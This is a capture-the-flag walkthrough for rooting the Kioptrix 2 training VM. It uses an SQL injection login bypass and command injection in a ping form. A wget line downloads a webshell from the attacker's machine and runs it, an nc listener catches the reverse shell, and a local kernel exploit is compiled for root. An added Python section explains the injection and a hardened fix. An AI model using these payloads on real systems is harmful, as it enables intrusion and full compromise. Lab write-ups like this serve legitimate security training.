Rooting Kioptrix 2 Walkthrough

Overview

Kioptrix 2 is a B2R VM designed for students to practice vulnerability analysis and exploitation. The objective is to root this virtual machine by exploiting vulnerabilities that lead to full system compromise.

Lab Setup:

  • VMware Workstation for virtual machines
  • Kali Linux VM in Bridge mode
  • Kioptrix in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap

Vulnerabilities Exploited:

  • SQL Injection
  • Command Execution
  • Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root

Reconnaissance/ Scanning

#netdiscover

Target VM IP Address: 192.168.8.105

nmap -p- -A --webxml -oX nmap-kioptrix2.xml 192.168.8.105

Nmap findings:

Found a website running on port 80.

Exploitation:

Found SQL injection in the website.

"admin' or 1=1 -- -"

"garbag"

Found command execution. Our goal is to upload a webshell. We need to find a utility that can download our webshell (wget, nc, etc.) and a writable directory.

127.0.0.1; pwd; ls -al; id; whereis wget

wget is available on the server, so we can use it to download the webshell onto the server. However, we cannot write the webshell to /var/www/html, because this directory is owned by root and is not writable by everyone. No problem: we can use /tmp for the webshell instead, with this command.

#127.0.0.1; wget 192.168.8.104/shell.txt -O /tmp/shell.php; php /tmp/shell.php

But before executing the above command, let's configure the webshell with the reverse IP address of our Kali Linux machine and start the web server:

#service apache2 start

and also an nc listener:

#nc -nvlp 1234

Execute the command.

Received interactive shell.
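Why the input 127.0.0.1; pwd; ls -al; id; whereis wget runs extra commands, and how the form should have handled it, as an added example that is not part of the original walkthrough or the target's code. It assumes the application concatenates the field into a shell command such as ping -c 3 <input>; the function names are hypothetical.

```python
import ipaddress
import shlex

# Input string taken from the walkthrough above.
PAGE_INPUT = "127.0.0.1; pwd; ls -al; id; whereis wget"
SEPARATORS = {";", "&", "&&", "|", "||"}


def vulnerable_cmdline(host):
    """Assumed vulnerable pattern: form input concatenated into a shell string."""
    return "ping -c 3 " + host


def commands_seen_by_shell(cmdline):
    """Approximate how a POSIX shell splits a line into separate commands."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def safe_ping_argv(host):
    """Hardened form: accept only a literal IP address and build an argv list.

    The list is meant for subprocess.run(argv) without shell=True, so no shell
    ever parses the input. Raises ValueError for anything that is not an IP.
    """
    addr = ipaddress.ip_address(host.strip())
    return ["ping", "-c", "3", str(addr)]


if __name__ == "__main__":
    for cmd in commands_seen_by_shell(vulnerable_cmdline(PAGE_INPUT)):
        print("shell would run:", cmd)
    print("accepted:", safe_ping_argv("127.0.0.1"))
    try:
        safe_ping_argv(PAGE_INPUT)
    except ValueError as exc:
        print("rejected:", exc)
```

Strict parsing of the field as an IP address, combined with an argv list instead of a shell string, removes the command separator from the picture entirely; blacklisting the ; character alone would not.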

Privilege Escalation

Let's check the operating system and kernel version, and check whether any exploit is available.

I don't know why each character is typed 2 times 😦

Searching through exploitdb found an exploit for CentOS 4.5.

Move to the exploit directory and start the SimpleHTTPServer Python module:

#cd /usr/share/exploitdb/exploits/linux_x86/local/

#python -m SimpleHTTPServer 8888

and on the target VM, download the exploit code:

#wget http://192.168.8.104:8888/9542.c

#gcc 9542.c

#./a.out

Congrats! We are root!!!

References:

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
